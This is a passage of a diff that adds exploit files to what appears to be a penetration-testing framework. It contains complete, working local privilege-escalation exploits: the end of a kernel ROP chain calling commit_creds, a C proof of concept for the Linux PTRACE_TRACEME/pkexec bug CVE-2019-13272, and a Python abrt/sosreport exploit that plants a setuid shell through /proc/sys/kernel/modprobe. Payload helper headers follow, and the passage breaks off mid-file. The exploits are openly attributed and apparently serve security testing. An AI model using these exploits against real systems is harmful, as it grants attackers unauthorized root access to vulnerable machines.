+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+

data/exploits/CVE-2019-13272/Makefile

@@ -0,0 +1,4 @@
+
+all:
+	x86_64-linux-musl-cc -static -s -pie poc.c -o exploit
+

data/exploits/CVE-2019-13272/poc.c

@@ -0,0 +1,464 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// Uses pkexec technique
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid executable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 17.3 kernel 4.4.0-89-generic
+// - Linux Mint 18.3 kernel 4.13.0-16-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - Redcore 1806 (LXQT) kernel 4.16.16-redcore
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// ---
+// user@linux-mint-19-2:~$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// user@linux-mint-19-2:~$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching for known helpers ...
+// [~] Found known helper: /usr/sbin/mate-power-backlight-helper
+// [.] Using helper: /usr/sbin/mate-power-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// To run a command as administrator (user "root"), use "sudo <command>".
+// See "man sudo_root" for details.
+//
+// root@linux-mint-19-2:/home/user#
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+/*
+ * execveat() syscall
+ * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
+ */
+#ifndef __NR_execveat
+#  define __NR_execveat 322
+#endif
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+};
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  int i;
+  for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+
+  return 0;
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  return force_exec_and_wait(child, 42, "stage3");
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  int warn = 0;
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
+    exit(EXIT_FAILURE);
+  }
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[-] Warning: grsec is in use\n");
+    warn++;
+  }
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    warn++;
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    warn++;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      warn++;
+    }
+  }
+
+  dprintf("[~] Done, looks good\n");
+
+  return warn;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+int find_helpers() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run: %s\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes*/
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    int i;
+    for (i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
+      continue;
+    }
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Using helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  /* Search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  int i;
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) == 0) {
+      helper_path = known_helpers[i];
+      dprintf("[~] Found known helper: %s\n", helper_path);
+      ptrace_traceme_root();
+    }
+  }
+
+  /* Search polkit policies for helper executables */
+  dprintf("[.] Searching for useful helpers ...\n");
+  find_helpers();
+  for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) == 0) {
+      helper_path = helpers[i];
+      ptrace_traceme_root();
+    }
+  }
+
+  return 0;
+}

data/exploits/cve-2015-5287/sosreport-rhel7.py

@@ -0,0 +1,114 @@
+#!/usr/bin/python
+# CVE-2015-5287 (?)
+# abrt/sosreport RHEL 7.0/7.1 local root
+# rebel 09/2015
+
+# [user@localhost ~]$ python sosreport-rhel7.py
+# crashing pid 19143
+# waiting for dump directory
+# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
+# waiting for sosreport directory
+# sosreport:  sosreport-localhost.localdomain-20151130194114
+# waiting for tmpfiles
+# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
+# moving directory
+# moving tmpfiles
+# tmpurfpyY -> tmpurfpyY.old
+# tmpYnCfnQ -> tmpYnCfnQ.old
+# waiting for sosreport to finish (can take several minutes)........................................done
+# success
+# bash-4.2# id
+# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+# bash-4.2# cat /etc/redhat-release 
+# Red Hat Enterprise Linux Server release 7.1 (Maipo)
+
+import os,sys,glob,time,sys,socket
+
+payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
+
+pid = os.fork()
+
+if pid == 0:
+	os.execl("/usr/bin/sleep","sleep","100")
+
+time.sleep(0.5)
+
+print "crashing pid %d" % pid
+
+os.kill(pid,11)
+
+print "waiting for dump directory"
+
+def waitpath(p):
+	while 1:
+		r = glob.glob(p)
+		if len(r) > 0:
+			return r
+		time.sleep(0.05)	
+
+dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
+
+print "dump directory: ", dumpdir
+
+os.chdir(dumpdir)
+
+print "waiting for sosreport directory"
+
+sosreport = waitpath("sosreport-*")[0]
+
+print "sosreport: ", sosreport
+
+print "waiting for tmpfiles"
+tmpfiles = waitpath("tmp*")
+
+print "tmpfiles: ", tmpfiles
+
+print "moving directory"
+
+os.rename(sosreport, sosreport + ".old")
+os.mkdir(sosreport)
+os.chmod(sosreport,0777)
+
+os.mkdir(sosreport + "/sos_logs")
+os.chmod(sosreport + "/sos_logs",0777)
+
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
+
+print "moving tmpfiles"
+
+for x in tmpfiles:
+	print "%s -> %s" % (x,x + ".old")
+	os.rename(x, x + ".old")
+	open(x, "w+").write("/tmp/hax.sh\n")
+	os.chmod(x,0666)
+
+
+os.chdir("/")
+
+sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
+
+
+def trigger():
+	open("/tmp/hax.sh","w+").write(payload)
+	os.chmod("/tmp/hax.sh",0755)
+	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
+	except: pass
+	time.sleep(0.5)
+	try:
+		os.stat("/tmp/sh")
+	except:
+		print "could not create suid"
+		sys.exit(-1)
+	print "success"
+	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
+	sys.exit(-1)
+
+for x in xrange(0,60*10):
+	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
+		print "done"
+		trigger()
+	time.sleep(1)
+	sys.stderr.write(".")
+
+print "timed out"

data/headers/windows/c_payload_util/chacha.h

@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}

data/headers/windows/c_payload_util/kernel32_util.h

@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
